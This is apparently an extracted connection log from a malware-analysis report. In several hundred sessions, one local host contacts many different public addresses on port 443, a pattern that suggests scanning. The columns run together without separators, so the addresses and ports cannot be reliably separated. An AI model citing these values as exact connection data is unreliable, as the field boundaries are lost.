                                                23493192.168.2.1337618209.170.135.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23494192.168.2.1337520114.112.162.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23495192.168.2.1347054178.125.227.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23496192.168.2.1349194218.75.199.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23497192.168.2.1349906186.148.166.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23498192.168.2.1334460208.198.17.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23499192.168.2.1335600120.151.22.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23500192.168.2.1337342164.3.202.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23501192.168.2.133294649.203.87.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23502192.168.2.1345044122.40.106.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23503192.168.2.1356296171.95.209.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23504192.168.2.1348304205.83.29.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23505192.168.2.1350800144.126.59.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23506192.168.2.133713064.158.56.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23507192.168.2.1337070148.166.163.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23508192.168.2.1354120197.106.23.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23509192.168.2.1349638119.191.164.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23510192.168.2.1336470118.49.15.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23511192.168.2.1333068223.226.186.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23512192.168.2.135980278.252.66.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23513192.168.2.1333872201.58.83.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23514192.168.2.1351894221.165.5.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23515192.168.2.1341788213.142.75.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23516192.168.2.1346076122.12.46.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23517192.168.2.133786260.110.110.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23518192.168.2.1340144107.99.237.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23519192.168.2.133781677.32.157.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23520192.168.2.1338742218.125.162.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23521192.168.2.1336174177.112.192.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23522192.168.2.133787227.141.104.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23523192.168.2.134479491.111.224.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23524192.168.2.1350346157.154.156.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23525192.168.2.13438749.112.113.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23526192.168.2.1352090207.41.27.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23527192.168.2.134856234.1.56.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23528192.168.2.1350252195.120.121.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23529192.168.2.1359056148.49.73.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23530192.168.2.133771261.155.97.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23531192.168.2.1355420175.150.72.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23532192.168.2.1357632198.199.190.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23533192.168.2.1338376138.94.27.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23534192.168.2.1335144117.161.58.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23535192.168.2.1344834206.232.54.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23536192.168.2.1350156122.101.53.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23537192.168.2.134843268.18.190.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23538192.168.2.1345354150.161.76.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23539192.168.2.1337064122.41.122.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23540192.168.2.134318239.79.88.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23541192.168.2.134260632.78.144.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23542192.168.2.1347812108.218.171.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23543192.168.2.1359874220.53.11.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23544192.168.2.134651473.221.113.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23545192.168.2.1354698176.176.193.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23546192.168.2.1345478134.174.142.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23547192.168.2.134541838.78.187.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23548192.168.2.1340502167.83.164.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23549192.168.2.1351416158.24.213.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23550192.168.2.135145658.231.107.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23551192.168.2.135381632.46.242.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23552192.168.2.135899692.41.249.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23553192.168.2.135168053.246.52.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23554192.168.2.135597254.97.40.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23555192.168.2.1354006201.143.77.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23556192.168.2.136069899.190.8.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23557192.168.2.135655012.35.107.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23558192.168.2.1338630191.116.252.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23559192.168.2.133335437.70.141.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23560192.168.2.135770451.212.208.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23561192.168.2.1353030126.204.51.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23562192.168.2.1356608144.189.215.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23563192.168.2.134332289.116.72.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23564192.168.2.135888839.196.62.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23565192.168.2.1346208125.199.247.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23566192.168.2.135483223.24.226.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23567192.168.2.134407841.255.144.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23568192.168.2.1351414157.242.51.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23569192.168.2.13552042.88.212.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23570192.168.2.1346054211.201.33.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23571192.168.2.1354730109.190.249.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23572192.168.2.1360378199.235.58.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23573192.168.2.1333786145.71.252.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23574192.168.2.1345266120.119.6.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23575192.168.2.1351868168.160.161.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23576192.168.2.1360100100.54.16.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23577192.168.2.1360420183.164.215.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23578192.168.2.1358662198.201.193.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23579192.168.2.1344406168.52.130.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23580192.168.2.1352036202.159.39.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23581192.168.2.133723620.112.80.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23582192.168.2.1335696163.168.38.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23583192.168.2.1336576143.65.2.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23584192.168.2.135734868.40.150.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23585192.168.2.1343818200.42.150.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23586192.168.2.1357564203.104.225.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23587192.168.2.1343210114.207.112.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23588192.168.2.1334760178.183.202.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23589192.168.2.1343938184.240.188.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23590192.168.2.135086032.17.198.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23591192.168.2.1349494173.244.208.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23592192.168.2.1348408147.105.53.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23593192.168.2.1340958139.245.62.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23594192.168.2.1354380114.28.254.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23595192.168.2.1342718123.99.106.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23596192.168.2.135700440.125.2.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23597192.168.2.134188265.29.45.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23598192.168.2.133302268.59.32.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23599192.168.2.1347216117.86.169.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23600192.168.2.133922234.159.12.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23601192.168.2.135926857.159.220.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23602192.168.2.1338992155.63.142.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23603192.168.2.136010475.138.116.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23604192.168.2.1355696120.245.205.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23605192.168.2.1342638222.156.19.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23606192.168.2.1337796143.72.248.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23607192.168.2.135751446.59.248.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23608192.168.2.134112465.133.3.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23609192.168.2.135957466.34.209.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23610192.168.2.1344342216.71.64.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23611192.168.2.133989860.61.99.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23612192.168.2.133813841.0.43.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23613192.168.2.135491651.173.61.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23614192.168.2.1354406112.48.240.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23615192.168.2.133664682.91.132.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23616192.168.2.135435042.42.238.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23617192.168.2.1353912165.104.121.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23618192.168.2.1357432197.208.183.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23619192.168.2.1336924109.62.119.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23620192.168.2.1349018193.158.188.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23621192.168.2.1333894197.234.228.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23622192.168.2.1332876115.198.146.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23623192.168.2.1342158174.20.4.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23624192.168.2.134866280.223.139.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23625192.168.2.1339200144.11.76.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23626192.168.2.13523969.69.167.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23627192.168.2.1335458107.8.219.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23628192.168.2.1339238193.144.63.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23629192.168.2.1351514139.227.79.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23630192.168.2.1347410221.59.26.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23631192.168.2.1349860112.132.217.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23632192.168.2.135574264.241.11.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23633192.168.2.1334582188.253.69.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23634192.168.2.133705061.199.35.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23635192.168.2.1342936217.60.10.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23636192.168.2.1352352218.166.27.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23637192.168.2.1360636140.147.173.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23638192.168.2.13394949.146.208.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23639192.168.2.133788631.121.178.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23640192.168.2.1350910223.208.70.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23641192.168.2.134935445.250.101.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23642192.168.2.134256838.223.68.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23643192.168.2.135234053.61.247.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23644192.168.2.1360108173.91.173.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23645192.168.2.13338001.101.237.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23646192.168.2.1339890135.86.165.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23647192.168.2.1334576198.92.36.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23648192.168.2.1336170102.161.199.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23649192.168.2.1352960151.5.4.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23650192.168.2.1343910208.57.130.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23651192.168.2.1358590118.8.27.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23652192.168.2.134452690.47.131.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23653192.168.2.13541144.209.128.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23654192.168.2.1360808207.210.41.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23655192.168.2.133941413.199.26.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23656192.168.2.1333670178.207.216.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23657192.168.2.1356184133.93.19.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23658192.168.2.1341718175.109.50.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23659192.168.2.135227095.160.179.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23660192.168.2.1354506129.88.166.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23661192.168.2.1338540143.5.36.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23662192.168.2.133655834.179.32.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23663192.168.2.135256287.96.91.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23664192.168.2.134384091.175.56.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23665192.168.2.133450032.78.213.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23666192.168.2.1345366199.198.89.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23667192.168.2.1354666212.213.172.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23668192.168.2.1349036136.127.128.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23669192.168.2.13420008.245.187.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23670192.168.2.1354380184.138.113.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23671192.168.2.133525274.9.172.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23672192.168.2.133796044.44.220.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23673192.168.2.1335152110.87.76.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23674192.168.2.1352380153.92.148.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23675192.168.2.1334624208.48.28.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23676192.168.2.1341142199.32.132.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23677192.168.2.1338228153.154.209.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23678192.168.2.1353008217.77.82.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23679192.168.2.1354474125.7.73.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23680192.168.2.1343226172.222.132.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23681192.168.2.1339024144.204.149.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23682192.168.2.1353386149.153.242.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23683192.168.2.135272450.49.189.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23684192.168.2.1336556175.27.76.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23685192.168.2.1334260221.183.181.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23686192.168.2.135414443.217.119.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23687192.168.2.133757069.67.66.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23688192.168.2.133633291.80.112.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23689192.168.2.1352444147.174.70.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23690192.168.2.133401018.31.211.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23691192.168.2.1346862126.190.238.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23692192.168.2.135511053.238.168.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23693192.168.2.135921219.35.32.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23694192.168.2.133401474.101.224.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23695192.168.2.1360786124.114.83.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23696192.168.2.1342406138.36.248.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23697192.168.2.135280279.107.233.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23698192.168.2.133670247.240.143.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23699192.168.2.1342032103.53.63.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23700192.168.2.135316845.181.140.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23701192.168.2.135462859.66.199.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23702192.168.2.1340530111.179.190.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23703192.168.2.134877281.199.125.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23704192.168.2.133531697.69.125.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23705192.168.2.1339362135.23.251.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23706192.168.2.1336746104.68.18.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23707192.168.2.136036027.121.207.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23708192.168.2.1333406167.148.212.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23709192.168.2.133512070.190.65.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23710192.168.2.133805867.138.115.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23711192.168.2.135185612.252.198.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23712192.168.2.135430889.68.147.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23713192.168.2.133343481.174.154.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23714192.168.2.133869218.191.178.96443
                                                TimestampBytes transferredDirectionData


